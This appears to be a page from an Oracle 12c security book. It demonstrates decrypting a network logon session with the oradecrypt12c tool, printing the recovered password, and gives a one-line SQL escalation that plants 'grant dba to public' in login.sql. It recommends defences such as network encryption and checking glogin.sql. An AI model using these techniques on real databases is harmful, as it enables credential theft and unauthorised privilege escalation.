Database Reference
In-Depth Information
It should be noted that the chooser/magic number and key are likely to be updated over time with each release,
so the above should only be used as evidence to demonstrate that it is certainly still possible to decrypt DBlinks and
therefore it is essential to defend against a user who has gained the privilege to read DBlink password ciphertext.
Defense and forensic response to this threat in 12c is the subject of the following chapter, but first, what about network
authentication decryption in 12c?
Network Authentication Decryption in 12c
Because the shared secret of the password hash is used as an input into the network session encryption from client
to DB, once it is gained by an attacker it can be used to decrypt back to the plaintext password. This is why Oracle
12c omits
sys.user$
from
SELECT ANY DICTIONARY
. The following demonstration shows that it is also possible using
Laszlo's
oradecrypt12c
tool to decrypt the logon password from a network authentication session.
root@orlin $ ./oradecrypt12c -s
E0E2E8A644437AF1AF826BDA694F788888D2CF36E11D83B08794AFE86B11FC26B156847707A90CFED7EFC4255AD2B3BF -c
02D999F2C6025C9917F82D895626FFAF12F8749AE658450961F4654956A0D731EFD1DEF66096FA6A50DC3627768A
C617 -a 270862B29FC8C613C315CF1F7E3E9C07428F2058383A748827770489165F5E08 -h
492976D589156D42A26FBC1A4A5A42FA3F332F0EA031B4F508159B81FF940B71BC2DEA6D0AF16FEA1A15116B261D
3B146FE49D5C34D049DD11EC422611F85A2C1BAF25A4E229BD232B13B0437BD42DE4
The AUTH_SESSKEY server is:
A2505EB919AE4AFB33AFFF3C647DBE39E2DEEE656CC164E69CBE73D11AE5690B945C559E165E3A88A6ACE7955AF15
The AUTH_PASSWORD encryption key is:
5DC1AE2D4C083ABEB49207598C35D447DBAF3BE74E9140567D931C6CE47EEC
The password is: Test1234
EA619641CFF531EB5327EC7E73F43CE54657374313233348888888898982993E00000000000D8F82993E00018186DEFF7F00
The threat from this session decryption is mitigated by applying ASO TCPS network encryption. This is free of
charge in 12c (and in lower versions) but is not turned on by default. It is the recommendation of this topic to work
towards turning on this or native encryption as a matter of priority in order to protect the DBSNMP cloud control
connections. More on this in Chapter 14.
Phishing for SYSDBA
Phishing for SYSDBA privs, or “phisyshing,” as it has just been named, is another slant on privilege escalation enabling
the ambitious user to cause authorized DBA privilege to execute their code; for example, using the previously existing
directory conveniently provided by the default 12c install.
exec dbms_advisor.create_file ('grant dba to public;', 'OPATCH_SCRIPT_DIR','login.sql');
Any invocation of SQL*PLUS from the OPATCH_SCRIPT_DIR will automatically invoke SQL contained within
login.sql, as well as the global
glogin.sql:
/home/oracle/app/oracle2/product/12.1.0/dbhome_2/sqlplus/admin/glogin.sql
It is imperative for DBAs to check the contents of local
login.sql
as well as the global
glogin.sql
and to state
check the
glogin.sql
with sha1, and preferably leave it with read-only *nix permissions.
